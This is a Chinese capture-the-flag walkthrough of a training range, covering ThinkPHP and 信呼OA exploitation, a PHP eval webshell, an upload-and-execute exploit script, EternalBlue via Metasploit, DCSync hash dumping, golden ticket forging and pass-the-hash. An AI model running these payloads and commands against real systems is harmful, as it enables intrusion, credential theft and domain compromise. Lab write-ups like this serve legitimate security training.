春秋云境—Initial

文章目录

    • 春秋云境—Initial
        • 一、前期准备
          • 1、靶标介绍
          • 2、相关设备
        • 二、WEB渗透
          • 1、ThinkPHP RCE
            • (1)、打开网站
            • (2)、检测漏洞
          • 2、蚁剑连接
          • 3、sudo提权
          • 4、frpc代理
          • 5、fsacn扫描
        • 三、后渗透
          • 1、信呼OA RCE
            • (1)、1.php木马
            • (2)、exp.py漏洞脚本
            • (3)、查看路径
          • 2、蚁剑连接
          • 3、永恒之蓝
          • 4、DCSync
            • (1)、DCSync简介
            • (2)、导出域内所有用户Hash
            • (3)、生成黄金票据
            • (4)、导入黄金票据
            • (5)、HASH传递

春秋云境—Initial

一、前期准备

1、靶标介绍

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

2、相关设备
设备名称IP地址
Web39.98.120.156
172.22.1.15
XIAORANG-OA01172.22.1.18
XIAORANG-WIN7172.22.1.21
DC01172.22.1.2

二、WEB渗透

1、ThinkPHP RCE
(1)、打开网站
http://39.98.120.156/

在这里插入图片描述

(2)、检测漏洞

在这里插入图片描述

2、蚁剑连接

在这里插入图片描述
在这里插入图片描述

3、sudo提权
(www-data:/tmp) $ sudo -l
(www-data:/tmp) $ sudo mysql -e '\! cat /root/flag/flag01.txt'

在这里插入图片描述

4、frpc代理
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x frpc*
(www-data:/tmp) $ ./frpc -c ./frpc.ini
5、fsacn扫描
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x fscan
(www-data:/tmp) $ ./fscan -h 172.22.1.0/24
172.22.1.2:445 open
172.22.1.2:135 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:80 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.18:3306 open
[+] NetInfo:
[*]172.22.1.21[->]XIAORANG-WIN7[->]172.22.1.21
[+] NetInfo:
[*]172.22.1.18[->]XIAORANG-OA01[->]172.22.1.18
[*] WebTitle:http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] 172.22.1.2     [+]DC XIAORANG\DC01              Windows Server 2016 Datacenter 14393
[+] 172.22.1.21	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.21          XIAORANG\XIAORANG-WIN7     Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[+] NetInfo:
[*]172.22.1.2[->]DC01[->]172.22.1.2
[*] 172.22.1.18          XIAORANG\XIAORANG-OA01     Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

三、后渗透

1、信呼OA RCE
(1)、1.php木马
<?php eval($_POST["1"]);?>
(2)、exp.py漏洞脚本
import requestssession = requests.session()url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'YWRtaW4=','adminpass': 'YWRtaW4xMjM=','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
(3)、查看路径

在这里插入图片描述

2、蚁剑连接

在这里插入图片描述
在这里插入图片描述

3、永恒之蓝
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
set proxies socks5:116.196.88.132:6001
exploit 
4、DCSync
(1)、DCSync简介

在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。

域控制器(DC)是 Active Directory(AD) 域的支柱用于管理域内用户。在现实场景中,为了防止 DC 崩溃导致连带域内瘫痪,会额外布置多台域控制器。当出现了多台域控制器时,为了实现数据同步,不同域控制器(DC)之间每 15 分钟都会有一次域数据的同步,当 DC1 想从 DC2 获取数据时,DC1 会向 DC2 发起GetNCChanges请求,该数据包包含需要同步的数据。

DCSync则是通过上述原理,利用 Directory Replication Service(DRS)服务的GetNCChanges接口向域发起数据同步请求。

windows 域默认可以运行以下组内用户登陆到域控中:

Enterprise Admins (目录林管理员组)
Domain Admins(域管理员组)
Administrators
Backup Operators
Account Operators
Print Operators

如果一个攻击者能够拿下以上组中的一个账户,整个活动目录就可能被攻陷,因为这些用户组有登陆到域控的权限,除此之外,还需要提权到 system 权限。

(2)、导出域内所有用户Hash
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

在这里插入图片描述

(3)、生成黄金票据
meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt

在这里插入图片描述

(4)、导入黄金票据
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt

在这里插入图片描述

(5)、HASH传递
proxychains4 impacket-wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/28171.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Typora设置Gitee图床,自动上传图片

之前写了一篇同类型文章&#xff1a;如何将Typora中图片上传到csdn 实现了Typora本地编辑的内容中的图片&#xff0c;可以直接复制到csdn上进行发布。但是在使用过程中发现sm.ms这个图床站不是很稳定&#xff0c;即使用了翻墙也不稳定。 这篇文章推荐使用Gitee作为图床&#xf…

001-Spring简要原理分析-草稿

Bean查找流程 根据类型找找到多个根据名称找 Map<被代理类&#xff0c; List<方法>> 事务 Config 方法代理

还在使用冒泡排序遍历数组?No No No 库函数qsort帮你搞定所有排序还不快学起来!

&#x1f3ac; 鸽芷咕&#xff1a;个人主页 &#x1f525; 个人专栏:《快速入门C语言》《C语言初阶篇》 ⛺️生活的理想&#xff0c;就是为了理想的生活! 文章目录 前言&#x1f4ac; 库函数qsort的介绍&#x1f4ac; 库函数qsort的参数介绍&#x1f4ad; 参数一 (void* base)…

Unity游戏源码分享-迷你高尔夫球游戏MiniGolfConstructionKitv1.1

Unity游戏源码分享-迷你高尔夫球游戏MiniGolfConstructionKitv1.1 有多个游戏关卡 工程地址&#xff1a;https://download.csdn.net/download/Highning0007/88052881

保荐人“临阵脱逃”,上市折戟的汉王药业问题出在哪?

撰稿|行星 来源|贝多财经 近日&#xff0c;上海证券交易所披露的信息显示&#xff0c;因陕西汉王药业股份有限公司&#xff08;以下简称“汉王药业”&#xff09;的保荐人兴业证券申请撤销保荐&#xff0c;上海证券交易所终止了对其在主板上市的审核。 据贝多财经了解&#x…

Java springBoot项目报LDAP health check failed

报错内容如下&#xff1a; 在bootstrap.yml文件里加 management:health:ldap:enabled: false 配置。 或者在application.properties文件里加&#xff1a; management.health.ldap.enabledfalse 参考答案&#xff1a;LDAP health check failed 难道没有人遇到这样的问题吗&…

论文--高通量田间植物表型:一种用于分割重叠植物的自监督序列CNN方法

Title: High-Throughput Field Plant Phenotyping: A Self-Supervised Sequential CNN Method to Segment Overlapping Plants Abstract: High-throughput plant phenotyping—the use of imaging and remote sensing to record plant growth dynamics—is becoming more wide…

【岛屿最大面积】BJ某IT厂笔试题

该题在LeetCode上能找到原题&#xff0c;大致意思是&#xff0c;给你一个大小为 m x n 的二进制矩阵 grid 。岛屿 是由一些相邻的 1 (代表土地) 构成的组合&#xff0c;这里的「相邻」要求两个 1 必须在 水平或者竖直的四个方向上 相邻。你可以假设 grid 的四个边缘都被 0&…

《MySQL》事务

文章目录 概念事务的操作属性&#xff08;aicd&#xff09; 概念 一组DML语句&#xff0c;这组语句要一次性执行完毕&#xff0c;是一个整体 为什么要有事务&#xff1f; 为应用层提供便捷服务 事务的操作 有一stu表 # 查看事务提交方式(默认是开启的) show variables like au…

uniapp调接口出现跨域问题。

今天在写uniapp项目的时候&#xff0c;使用在线模拟接口的时候&#xff0c;出现跨域问题。 【问题描述】&#xff1a; ①在内嵌浏览器运行&#xff0c;不会出现跨域问题&#xff0c;好像是内嵌浏览器自动去掉了跨域问题。 ②在外部浏览器调用的时候会出现跨域问题。&#xf…

深入理解Spring事务传播机制-原理与实例说明

事务传播机制 简化记忆版本 REQUIRED:有事务加入&#xff0c;没有事务创建&#xff0c;Spring默认MANDATORY:必须在事务中被调用&#xff0c;没有抛异常SUPPORTS:有事务加入&#xff0c;没有以非事务运行NOT_SUPPORTED:不需要事务&#xff0c;有事务则挂起&#xff0c;避免回…

黑马头条 分布式任务调度 定时计算热点文章、xxl-job、kafkaStream

xxl-Job分布式任务调度 1 今日内容 1.1 需求分析 目前实现的思路&#xff1a;从数据库直接按照发布时间倒序查询 问题1&#xff1a; 如何访问量较大&#xff0c;直接查询数据库&#xff0c;压力较大问题2&#xff1a; 新发布的文章会展示在前面&#xff0c;并不是热点文章 1.2 …